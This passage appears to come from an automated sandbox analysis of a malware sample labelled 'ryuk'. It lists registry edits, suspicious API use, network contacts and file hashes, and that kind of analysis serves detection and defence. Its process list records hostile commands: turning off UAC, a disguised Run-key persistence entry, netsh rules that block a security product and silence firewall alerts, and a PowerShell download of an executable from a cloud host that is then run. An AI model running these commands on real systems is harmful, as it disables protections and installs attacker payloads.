| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\ = "URL:Telegram Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "
C:\programdata\20250223024202\Agghosts.exe
"C:\programdata\20250223024202\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
C:\Users\Public\Videos\bin.exe
"C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| N/A | 127.0.0.1:56118 | | tcp |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| NL | 149.154.167.51:443 | | tcp |
| NL | 95.161.76.100:443 | | tcp |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| US | 8.8.8.8:53 | td.telegram.org | udp |
| NL | 149.154.167.99:443 | td.telegram.org | tcp |
| NL | 149.154.167.91:443 | | tcp |
| NL | 149.154.167.51:443 | | tcp |
| NL | 95.161.76.100:443 | | tcp |
| NL | 149.154.167.91:80 | 149.154.167.91 | tcp |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| SG | 149.154.171.5:443 | | tcp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| SG | 149.154.171.5:80 | 149.154.171.5 | tcp |
| US | 8.8.8.8:443 | dns.google.com | tcp |
| NL | 95.161.76.101:443 | | tcp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
Files
memory/396-11-0x0000000140000000-0x0000000140419000-memory.dmp
memory/396-12-0x000001E44BF00000-0x000001E44C314000-memory.dmp
memory/396-13-0x000001E44B980000-0x000001E44B981000-memory.dmp
memory/396-14-0x0000000140000000-0x0000000140419000-memory.dmp
C:\ProgramData\20250223024202\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\Users\Public\Downloads\20250223024202\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\programdata\20250223024202\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\ProgramData\lnk\2.lnk
| MD5 | 97dd1e75e3378d3e5f4cb676787df4c5 |
| SHA1 | 9050ff87b70c2d534c1218113a3f5e3d971b4d90 |
| SHA256 | fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee |
| SHA512 | acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655 |
memory/396-62-0x0000000140000000-0x0000000140419000-memory.dmp
memory/5056-63-0x0000000002BF0000-0x0000000002C19000-memory.dmp
C:\programdata\20250223024202\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\Users\Public\Downloads\20250223024202\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/1580-70-0x0000023494020000-0x0000023494042000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\Videos\bin.exe
| MD5 | 06eaa3263801f4d695c3727834ffbca5 |
| SHA1 | 58031db0039cf00a1fe738e55ee2fca35558c4fd |
| SHA256 | 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff |
| SHA512 | 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3 |
memory/4084-86-0x00000000002E0000-0x00000000003B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
| MD5 | 2e90747fe82d7271fbe97ea022fd5173 |
| SHA1 | 6164bc0ec0c908e9159a0c5d558945d7974e11c1 |
| SHA256 | bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4 |
| SHA512 | d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44 |
memory/4084-93-0x00000000002E0000-0x00000000003B8000-memory.dmp
memory/1712-94-0x0000000000150000-0x0000000000487000-memory.dmp
memory/1712-96-0x0000000000150000-0x0000000000487000-memory.dmp
memory/1712-105-0x0000000000150000-0x0000000000487000-memory.dmp
C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll
| MD5 | a7349236212b0e5cec2978f2cfa49a1a |
| SHA1 | 5abb08949162fd1985b89ffad40aaf5fc769017e |
| SHA256 | a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082 |
| SHA512 | c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02 |
memory/1712-126-0x0000000000150000-0x0000000000487000-memory.dmp
memory/4084-127-0x00000000002E0000-0x00000000003B8000-memory.dmp